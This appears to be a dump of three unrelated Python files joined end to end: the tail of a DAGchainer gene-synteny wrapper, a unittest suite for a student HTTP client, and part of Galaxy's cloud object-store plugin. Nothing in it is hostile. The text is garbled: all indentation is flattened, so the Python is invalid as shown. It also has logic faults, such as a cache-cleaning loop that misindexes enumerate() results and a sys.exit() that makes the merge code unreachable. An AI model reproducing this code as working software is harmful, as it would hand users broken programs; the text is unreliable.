li[0], li[-1] = int(li[0]), int(li[-1])
li[1] = float(li[1])
return dict(zip(cols, li))
def get_merge_gene(fh, header=[None]):
if header[0] is None:
header[0] = fh.readline()
line = fh.readline()
genes = []
while line and line[0] != "#":
d = DagLine(line)
genes.append(d)
line = fh.readline()
if len(genes) == 0: return None, None
l = header[0]
header_string = parse_pyheader(header[0], asstring=True)
# save the next header.
header[0] = line
# header string is joined with JS
reverse = JS + "r" + JS in header_string
a_start = min(g.a_start for g in genes)
a_end = max(g.a_end for g in genes)
b_start = min(g.b_start for g in genes)
b_end = max(g.b_end for g in genes)
if reverse: b_start, b_end = b_end, b_start
d = {'a_seqid': genes[0].a_seqid,
'b_seqid': genes[0].b_seqid,
'a_accn': 'a' + header_string,
'b_accn': 'b' + header_string,
'a_start': a_start,
'b_start': b_start,
'a_end': a_end,
'b_end': b_end,
'evalue': 1e-250}
return DagLine.from_dict(d), header_string
class DagGenerator(object):
__slots__ = ('fh', 'best', 'getter')
def __init__(self, fh, getter_fn):
self.fh = fh
self.getter = getter_fn
def __iter__(self):
while True:
d, header = self.getter(self.fh)
if d is None: break
yield d, header
raise StopIteration
class BestDagGenerator(DagGenerator):
def __init__(self, fh, getter_fn):
DagGenerator.__init__(self, fh, getter_fn)
def __iter__(self):
ahits = collections.defaultdict(list)
bhits = collections.defaultdict(list)
hits = []
for d, header in DagGenerator(self.fh, self.getter):
if d.a_seqid == d.b_seqid and d.a_accn == d.b_accn: continue
hits.append((d, header))
ahits[d.a_accn].append((d.evalue, d.b_accn))
bhits[d.b_accn].append((d.evalue, d.a_accn))
HITS = 1
aahits = {}
for a, li in ahits.iteritems():
li.sort()
aahits[a] = [ah[1] for ah in li[:HITS]]
bbhits = {}
for b, li in bhits.iteritems():
li.sort()
bbhits[b] = [bh[1] for bh in li[:HITS]]
del bhits, ahits
self.hits = hits
i = 0
for d, header in self.hits:
if d.b_accn in aahits[d.a_accn] and d.a_accn in bbhits[d.b_accn]:
i += 1
yield d, header
print >>sys.stderr, "%i hits filtered down to %i" % (len(hits), i)
del self.hits
raise StopIteration
def parse_file(dag_file, evalue_cutoff, ignore_dist, merge_genes=False, best_only=False):
""" if dag_file is "-", then the stuff is read from stdin. """
accn_info = {}
matches = {}
fh = open(dag_file) if dag_file != "-" else sys.stdin
get_dag_next = get_merge_gene if merge_genes else get_dag_line
klass = BestDagGenerator if best_only else DagGenerator
for dag, dag_header in iter(klass(fh, get_dag_next)):
if dag.evalue >= evalue_cutoff: continue
if dag.a_seqid == dag.b_seqid:
if abs(dag.a_start - dag.b_start) < ignore_dist: continue
if dag.a_accn == dag.b_accn: continue
if not dag.a_accn in accn_info:
mid = int((dag.a_start + dag.a_end + 0.5) / 2)
a_feat = {'accn': dag.a_accn, 'start': dag.a_start, 'end': dag.a_end, 'mid': mid, 'seqid': dag.a_seqid}
accn_info[dag.a_accn] = a_feat
else:
a_feat = accn_info[dag.a_accn]
if not dag.b_accn in accn_info:
mid = int((dag.b_start + dag.b_end + 0.5) / 2)
b_feat = {'accn': dag.b_accn, 'start': dag.b_start, 'end': dag.b_end, 'mid': mid, 'seqid': dag.b_seqid}
accn_info[dag.b_accn] = b_feat
else:
b_feat = accn_info[dag.b_accn]
# always sort by seqid and order.
if dag.a_seqid > dag.b_seqid:
a_feat, b_feat = b_feat, a_feat
elif dag.a_seqid == dag.b_seqid and a_feat['mid'] > b_feat['mid']:
a_feat, b_feat = b_feat, a_feat
seqid_key = (a_feat['seqid'], b_feat['seqid'])
if not seqid_key in matches: matches[seqid_key] = {}
these_matches = matches[seqid_key]
if a_feat['accn'] < b_feat['accn']:
accn_key = a_feat['accn'], b_feat['accn']
else:
accn_key = b_feat['accn'], a_feat['accn']
if accn_key in these_matches:
if dag.evalue < these_matches[accn_key]['evalue']: these_matches[accn_key]['evalue'] = dag.evalue
else:
these_matches[accn_key] = {'A': a_feat, 'B': b_feat, 'evalue': dag.evalue}
these_matches[accn_key]['diag_str'] = dag_header
get_dag_line.header = None
print >>sys.stderr, "pairs:", sum(len(t.values()) for t in matches.values())
return matches
def parse_cheader(header):
""" dagchainer.cpp sends a header line: ">Alignment #%d score = %.1f\n"
we just want the 2 numbers.
"""
stuff = header.split()
return int(stuff[1][1:]), float(stuff[-1][:-1])
def run_dag_chainer(a_seqid, b_seqid, filename, matches, reverse, options,
# child_conn,
dagchainer=os.path.join(os.path.abspath(os.path.dirname(__file__)), "dagchainer")):
"""
calls dagchainer and yields groups of matches
"""
reverse = "-r" if "r" in reverse else ""
o = options
cmd = "%(dagchainer)s -G %(gap_length)s -O %(gap_init)s -E %(gap_extend)s -S " +\
"%(min_score)s -D %(max_dist)s -F %(filename)s %(reverse)s" # > %(tmp_file)s";
cmd = cmd % dict(gap_length=o.gap_dist, gap_init=o.gap_init,
gap_extend=o.gap_extend, min_score=o.min_score,
max_dist=o.gap_max, filename="-", reverse=reverse,
dagchainer=dagchainer)
#print >>sys.stderr, cmd
num2pair = matches.values()
"""
if not len(num2pair):
child_conn.send([])
child_conn.close()
return
"""
process = Popen(cmd, stdin=PIPE, stdout=PIPE, bufsize=8*4096, shell=True)
write = process.stdin.write
for i, pair in enumerate(num2pair):
write("%i\t%i\t%i\t%.4f\n" % (i, pair['A']['mid'], pair['B']['mid'], scoringF(pair['evalue'])))
process.stdin.close()
header = None
all_data = [] # added instead of yield to allow parallelization.
data = []
for line in process.stdout:
if line[0] == ">":
if header is None:
header = parse_cheader(line[1:].strip())
else:
if len(data) >= o.min_aligned_pairs:
#yield header, data
dag_num, dag_score = header
all_data.append((dag_num, dag_score, data))
header = parse_cheader(line[1:].strip())
data = []
continue
#index, pair_id, pos1, pos2, match_score, dag_chain_score = line.strip().split()
pair_id, dag_chain_score = line.rstrip("\n").split(" ")
pair = num2pair[int(pair_id)]
data.append({'pair': pair, 'dag_score': float(dag_chain_score)})
if len(data) >= o.min_aligned_pairs:
dag_num, dag_score = header
all_data.append((dag_num, dag_score, data))
#child_conn.send(all_data)
# child_conn.close()
return all_data
def print_alignment(dir, diag_num, dag_score, group, out):
# dir is 'f' or 'r'
# diag_id dagchainer score, a_seqid, b_seqid, dir, npairs
header_fmt = "#%i\t%.1f\t%s\t%s\t%s\t%i"
# best tells us to save the polygons for the orthologies
d = group[0]['pair']
print >>out, header_fmt % \
(diag_num, dag_score, d['A']['seqid'],
d['B']['seqid'], dir, len(group))
for pair_dict in group:
A = pair_dict['pair']['A']
B = pair_dict['pair']['B']
if opts.new_behavior:
print >>out, "%s\t%s\t%d\t%d\t%s\t%s\t%d\t%d\t%e\t%d" % (\
'a' + A['seqid'][1:], A['accn'], A['start'], A['end'],
'b' + B['seqid'][1:], B['accn'], B['start'], B['end'],
pair_dict['pair']['evalue'], pair_dict['dag_score'])
else:
print >>out, "%s\t%s\t%d\t%d\t%s\t%s\t%d\t%d\t%e\t%d" % (\
A['seqid'], A['accn'], A['start'], A['end'],
B['seqid'], B['accn'], B['start'], B['end'],
pair_dict['pair']['evalue'], pair_dict['dag_score'])
def run_and_print(all_matches, opts, out=sys.stdout):
filename = "-" # tells dagchainer to read from stdin.
# if out is False, it means we dont want to print, and so we
# dont print.
print_genes = bool(out)
merge_ids = []
best = opts.best
for (a_seqid, b_seqid), matches in sorted(all_matches.iteritems()):
"""
parent_connf, child_connf = mPipe()
pf = Process(target=run_dag_chainer, args=(a_seqid, b_seqid, filename, matches, "", opts, child_connf))
pf.start()
parent_connr, child_connr = mPipe()
pr = Process(target=run_dag_chainer, args=(a_seqid, b_seqid, filename, matches, "-r", opts, child_connr))
pr.start()
for dag_num, dag_score, group in parent_connf.recv():
if print_genes:
print_alignment('f', dag_num, dag_score, group, out, best)
else:
# for merged merge we just keep the direction and the 'accn' where
# the 'accn' is actually just the diag_id for the case of a merge
# run. this is used later to merge the merge with the genes.
# since the 'A' and 'B' accn are the same (except for the starting
# letter, just keep 'A'.
merge_ids.append(('f', a_seqid, b_seqid,
[g['pair']['A']['accn'][1:] for g in group],
len(group)))
pf.join()
for dag_num, dag_score, group in parent_connr.recv():
if print_genes:
print_alignment('r', dag_num, dag_score, group, out, best)
else:
merge_ids.append(('r', a_seqid, b_seqid,
[g['pair']['A']['accn'][1:] for g in group],
len(group)))
pr.join()
"""
for dir in ("f", "r"):
for dag_num, dag_score, group in run_dag_chainer(a_seqid, b_seqid, filename, matches, dir, opts):
if print_genes:
print_alignment(dir, dag_num, dag_score, group, out)
else:
# for merged merge we just keep the direction and the 'accn' where
# the 'accn' is actually just the diag_id for the case of a merge
# run. this is used later to merge the merge with the genes.
# since the 'A' and 'B' accn are the same (except for the starting
# letter, just keep 'A'.
merge_ids.append((dir, a_seqid, b_seqid,
[g['pair']['A']['accn'][1:] for g in group],
len(group)))
return merge_ids
######################
## merge diags stuff ##
######################
def merge_merge(merge, all_matches, opts, out):
""" merge the merge genes with the
original dag data sent in"""
#cols = ('id', 'dagscore', 'a_seqid', 'b_seqid', 'dir', 'ngenes')
by_diag = matches_by_diag_id(all_matches)
# wnat the longest first. then we remove shorter ones that are completely contained
# in the larger ones.
seen = {}
merge.sort(key=operator.itemgetter(4), reverse=True)
for i, (direction, a_seqid, b_seqid, diag_str_list, llen) in enumerate(merge):
# so here we have a list of merge-diags merged into a single diag...
dags = []
# and we go through and merge them into dags[].
# TODO: need to sort this out better. can merge-diags with opposite directions
# be merged??? when?
for diag_str in diag_str_list:
if not diag_str in by_diag: continue
these_dags = by_diag[diag_str]
#for d in by_diag[diag_str]:
# these_dags.append(d)
unseen_dags = [t for t in these_dags if not (t.a_accn, t.b_accn) in seen]
for ud in unseen_dags: seen[(ud.a_accn, ud.b_accn)] = None
if len(unseen_dags) >= opts.min_aligned_pairs / 2. \
or len(unseen_dags) / float(len(these_dags)) > 0.60:
dags.extend((str(ud) for ud in unseen_dags))
if len(dags) >= opts.min_aligned_pairs:
header = "#" + "\t".join([str(i), "100.0", a_seqid, b_seqid, direction,
str(len(dags))])
print >>out, header
print >>out, "\n".join(dags)
def matches_by_diag_id(matches):
""" take the structure returned by parse_file and return a dictionary
where the keys are the diag_ids and the values are the dag-pair."""
by_diag = collections.defaultdict(list)
for seqid_pair, accn_pair_dict in matches.iteritems():
for accn_pair_key, accn_pair in accn_pair_dict.iteritems():
assert accn_pair['diag_str'] is not None
by_diag[accn_pair['diag_str']].append(DagLine.from_pair_dict(accn_pair))
return dict(by_diag)
def adjust_opts_for_merge(opts):
opts.min_aligned_pairs = 1
opts.min_score = int(opts.min_aligned_pairs * 0.5 * opts.max_match_score)
opts.gap_dist = opts.gap_dist_merge if opts.gap_dist_merge != 0 else 4 * opts.gap_dist
opts.gap_max = opts.gap_max_merge if opts.gap_max_merge != 0 else 5 * opts.gap_max
assert 0 < opts.gap_dist < opts.gap_max
if __name__ == "__main__":
import optparse, sys
p = optparse.OptionParser()
p.add_option('-i', dest='dag', help="""dag file with format
a_seqid<tab>a_accn<tab>a_start<tab>a_end<tab>b_seqid<tab>b_accn<tab>b_start<tab>b_end<tab>e-value""")
p.add_option('-o', dest='gap_init', type='float', default=0,
help="gap open penalty")
p.add_option('-e', dest='gap_extend', type='float', default=-3,
help="gap extension penalty")
p.add_option('-x', dest="min_score", type='float', default=None,
help="minimum alignment score. alignment stops when score " + \
" below this value")
p.add_option('-g', dest='gap_dist', type='float', default=10000,
help="averge distance expected between 2 syntenic genes")
p.add_option('--gm', dest='gap_dist_merge', type='float', default=0,
help="averge distance expected between 2 syntenic merged genes"
" only applicable if --merge is specified")
p.add_option('-D', dest='gap_max', type='float', default=200000,
help="maximum distance between 2 matches")
p.add_option('--Dm', dest='gap_max_merge', type='float', default=0,
help="maximum distance expected between 2 syntenic merged genes"
" only applicable if --merge is specified")
p.add_option('-E', dest='evalue', type='float', default=1e-5,
help="maximum evalue.")
p.add_option('-A', dest='min_aligned_pairs', type='int', default=6,
help="minimum number of pairs to be considered a diagonal")
p.add_option('-I', dest='ignore_dist', default=25, type='int',
help="ignore hits on teh same chromosome within this distance"
" removes the self-self diagonal")
p.add_option('-M', dest='max_match_score', type='float', default=50,
help="maximum score to be assigned to a match")
p.add_option('--new_behavior',action="store_true",
help="does not require the first listed gene to be an 'a' and the second a 'b'")
p.add_option('--merge', dest='merge', default=None,
help=\
""" path to a file to send the output. when this is specified, the the
output is sent to the specified file. then dagchainer is re-run with
--gm and --Dm (corresponding to -g and -D in this help menu. but run
with each diagonal in the original output as a single gene the
resulting 'merged'-genes are run as normal through dagchainer. the
final ouput file with the name of this value + ".merge", will contain
genes merged into merge groups.
""")
p.add_option('--best', dest='best', default=False, action='store_true', help=\
"use only the reciprocal best hit in defining the dag lines. this"
" useful for defining orthologies. output to stdout will be pairs"
" as usual")
# dag file can also be sent in as the first arg.
opts, maybe_dag = p.parse_args()
print >>sys.stderr, opts
if not (opts.dag or maybe_dag):
sys.exit(p.print_help())
if not opts.dag: opts.dag = maybe_dag[0]
if opts.min_score is None:
opts.min_score = int(opts.min_aligned_pairs * 0.5 * opts.max_match_score)
# so here, we run the original dag_chainer. and save to opts.merge.
all_matches = parse_file(opts.dag, opts.evalue, opts.ignore_dist, merge_genes=False, best_only=opts.best)
out_file = open(opts.merge, 'wb') if opts.merge else sys.stdout
run_and_print(all_matches, opts, out=out_file)
#opts.best = False # never have best and merge...
sys.exit()
if opts.merge:
out_file.close()
# then we read that output file, merging the genes.
merged_dags = parse_file(opts.merge, opts.evalue, opts.ignore_dist, merge_genes=True, best_only=False)
# doh! still need to re-parse original. but it's pretty short compared to the original
# opts.dag so it's pretty fast.
unmerged_dags = parse_file(opts.merge, opts.evalue, opts.ignore_dist, merge_genes=False, best_only=False)
# then we run and print without printing.
adjust_opts_for_merge(opts)
# run it to get the merge, but dont print.
merge = run_and_print(merged_dags, opts, out=False)
out_file = open(opts.merge + ".merge", 'wb')
merge_merge(merge, unmerged_dags, opts, out_file)
|
freetests.py | #!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
cloud.py | """
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
unlink,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
from cloudbridge.factory import CloudProviderFactory, ProviderList
from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin:
def _config_to_dict(self):
return {
"provider": self.provider,
"auth": self.credentials,
"bucket": {
"name": self.bucket_name,
"use_reduced_redundancy": self.use_rr,
},
"connection": {
"host": self.host,
"port": self.port,
"multipart": self.multipart,
"is_secure": self.is_secure,
"conn_path": self.conn_path,
},
"cache": {
"size": self.cache_size,
"path": self.staging_path,
}
}
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super().__init__(config, config_dict)
self.transfer_progress = 0
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.provider = config_dict["provider"]
self.credentials = config_dict["auth"]
self.bucket_name = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self.conn = self._get_connection(self.provider, self.credentials)
self.bucket = self._get_bucket(self.bucket_name)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
@staticmethod
def _get_connection(provider, credentials):
log.debug(f"Configuring `{provider}` Connection")
if provider == "aws":
config = {"aws_access_key": credentials["access_key"],
"aws_secret_key": credentials["secret_key"]}
connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
elif provider == "azure":
config = {"azure_subscription_id": credentials["subscription_id"],
"azure_client_id": credentials["client_id"],
"azure_secret": credentials["secret"],
"azure_tenant": credentials["tenant"]}
connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
elif provider == "google":
config = {"gcp_service_creds_file": credentials["credentials_file"]}
connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
else:
raise Exception(f"Unsupported provider `{provider}`.")
# Ideally it would be better to assert if the connection is
# authorized to perform operations required by ObjectStore
# before returning it (and initializing ObjectStore); hence
# any related issues can be handled properly here, and ObjectStore
# can "trust" the connection is established.
#
# However, the mechanism implemented in Cloudbridge to assert if
# a user/service is authorized to perform an operation, assumes
# the user/service is granted with an elevated privileges, such
# as admin/owner-level access to all resources. For a detailed
# discussion see:
#
# https://github.com/CloudVE/cloudbridge/issues/135
#
# Hence, if a resource owner wants to only authorize Galaxy to r/w
# a bucket/container on the provider, but does not allow it to access
# other resources, Cloudbridge may fail asserting credentials.
# For instance, to r/w an Amazon S3 bucket, the resource owner
# also needs to authorize full access to Amazon EC2, because Cloudbridge
# leverages EC2-specific functions to assert the credentials.
#
# Therefore, to adhere with principle of least privilege, we do not
# assert credentials; instead, we handle exceptions raised as a
# result of signing API calls to cloud provider (e.g., GCP) using
# incorrect, invalid, or unauthorized credentials.
return connection
@classmethod
def parse_xml(clazz, config_xml):
# The following reads common cloud-based storage configuration
# as implemented for the S3 backend. Hence, it also attempts to
# parse S3-specific configuration (e.g., credentials); however,
# such provider-specific configuration is overwritten in the
# following.
config = parse_config_xml(config_xml)
try:
provider = config_xml.attrib.get("provider")
if provider is None:
msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
log.error(msg)
raise Exception(msg)
provider = provider.lower()
config["provider"] = provider
# Read any provider-specific configuration.
auth_element = config_xml.findall("auth")[0]
missing_config = []
if provider == "aws":
akey = auth_element.get("access_key")
if akey is None:
missing_config.append("access_key")
skey = auth_element.get("secret_key")
if skey is None:
missing_config.append("secret_key")
config["auth"] = {
"access_key": akey,
"secret_key": skey}
elif provider == "azure":
sid = auth_element.get("subscription_id")
if sid is None:
missing_config.append("subscription_id")
cid = auth_element.get("client_id")
if cid is None:
missing_config.append("client_id")
sec = auth_element.get("secret")
if sec is None:
missing_config.append("secret")
ten = auth_element.get("tenant")
if ten is None:
missing_config.append("tenant")
config["auth"] = {
"subscription_id": sid,
"client_id": cid,
"secret": sec,
"tenant": ten}
elif provider == "google":
cre = auth_element.get("credentials_file")
if not os.path.isfile(cre):
msg = f"The following file specified for GCP credentials not found: {cre}"
log.error(msg)
raise OSError(msg)
if cre is None:
missing_config.append("credentials_file")
config["auth"] = {
"credentials_file": cre}
else:
msg = f"Unsupported provider `{provider}`."
log.error(msg)
raise Exception(msg)
if len(missing_config) > 0:
msg = "The following configuration required for {} cloud backend " \
"are missing: {}".format(provider, missing_config)
log.error(msg)
raise Exception(msg)
else:
return config
except Exception:
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def to_dict(self):
as_dict = super().to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception(f"Could not get bucket '{bucket_name}'")
raise Exception
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
